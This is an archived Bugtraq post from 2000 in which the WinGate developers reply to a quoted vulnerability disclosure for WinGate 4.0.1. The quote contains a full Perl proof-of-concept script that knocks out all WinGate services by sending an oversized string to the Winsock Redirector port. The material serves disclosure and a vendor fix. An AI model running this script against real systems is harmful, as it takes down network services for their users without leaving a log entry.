[16998] in bugtraq
Re: Wingate 4.0.1 denial-of-service
daemon@ATHENA.MIT.EDU (Doug Kassuba)
Mon Oct 2 18:13:03 2000
Message-Id: <20001002185134.440.qmail@securityfocus.com>
Date: Mon, 2 Oct 2000 18:51:34 -0000
Reply-To: Doug Kassuba <dkassuba@I2K.NET>
From: Doug Kassuba <dkassuba@I2K.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
We used your information to analyse this weakness
and it was fixed for the next release, which will be the
beta version of WinGate 4.1. This is currently
available at http://wingate.deerfield.com/beta
For normal use it is not too serious a vulnerability as
the Winsock
Redirector Service is by default only bound to the
local network adaptors
and there is no point in binding it to public (internet)
adaptors, meaning
that the attack would have to be launched from within
the LAN. GateKeeper
will warn the operator when they bind the Winsock
Redirector Service to a
public adaptor.
WinGate Development Team
======================================
===========================
> Blue Panda Vulnerability Announcement: Wingate
4.0.1
> 02/10/2000 (dd/mm/yyyy)
>
> bluepanda@dwarf.box.sk
> http://bluepanda.box.sk/
>
======================================
===========================
>
> Details available in attached file.
>
>
>
>
>
>
>
>
======================================
===========================
> Blue Panda Vulnerability Announcement: Wingate
4.0.1
> 02/10/2000 (dd/mm/yyyy)
>
> bluepanda@dwarf.box.sk
> http://bluepanda.box.sk/
>
======================================
===========================
>
> Problem: The Wingate engine can be disabled by
sending an abnormal string to
> the Winsock Redirecter Service. The attack is not
logged.
>
> Vulnerable: Wingate Home/Standard/Pro 4.0.1,
possible prior versions
> (untested).
>
> Immune: Wingate 4.1 Beta A
>
> Vendor status: Notified.
>
> ===================
> Proof of concept:
> ===================
>
> #!/usr/bin/perl
> #
> # wgate401.pl - Wingate 4.0.1 denial-of-service
> # Blue Panda - bluepanda@dwarf.box.sk
> # http://bluepanda.box.sk/
> #
> # ----------------------------------------------------------
> # Disclaimer: this file is intended as proof of
concept, and
> # is not intended to be used for illegal purposes. I
accept
> # no responsibility for damage incurred by the use
of it.
> # ----------------------------------------------------------
> #
> # Causes all Wingate services to become
unavailable until the Wingate Engine
> # is restarted. The Winsock Redirector Service
must be enabled in order for
> # this to work. Tested on the evaluation version of
Wingate Pro 4.0.1.
> #
>
> use IO::Socket;
>
> $host = "host.com";
> $port = "2080";
> $sleepfor = 1;
>
> print "Wingate 4.0.1 denial-of-service
> Blue Panda - bluepanda\@dwarf.box.sk
> http://bluepanda.box.sk/
>
> ----------------------------------------------------------
> Disclaimer: this file is intended as proof of concept,
and
> is not intended to be used for illegal purposes. I
accept
> no responsibility for damage incurred by the use of
it.
> ----------------------------------------------------------
>
> Causes all Wingate services to become
unavailable until the Wingate Engine
> is restarted. The Winsock Redirector Service must
be enabled in order for
> this to work.\n\n";
>
> # Connect to the Winsock Redirector Service.
> print "Connecting to $host:$port...";
> $socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
> print "done.\n";
>
> # Send some characters to the Winsock
Redirector Service.
> $buffer = "a" x 1079;
> print $socket "$buffer";
>
> # Wait a few seconds.
> $counter = 0;
> print "Sleeping for $sleepfor seconds.";
> while($counter < $sleepfor) {
> sleep(1);
> print ".";
> $counter += 1;
> }
> print "\n";
>
> # Close the connection. The Winsock Redirector
Service should now be
> # disabled.
> close($socket);
>
> # Connect once more to the Winsock Redirector
Service. This will disable all
> # other services.
> print "Connecting to $host:$port...";
> $socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
> print "done.\n";
>
> # Finished.
> close($socket);
>
>
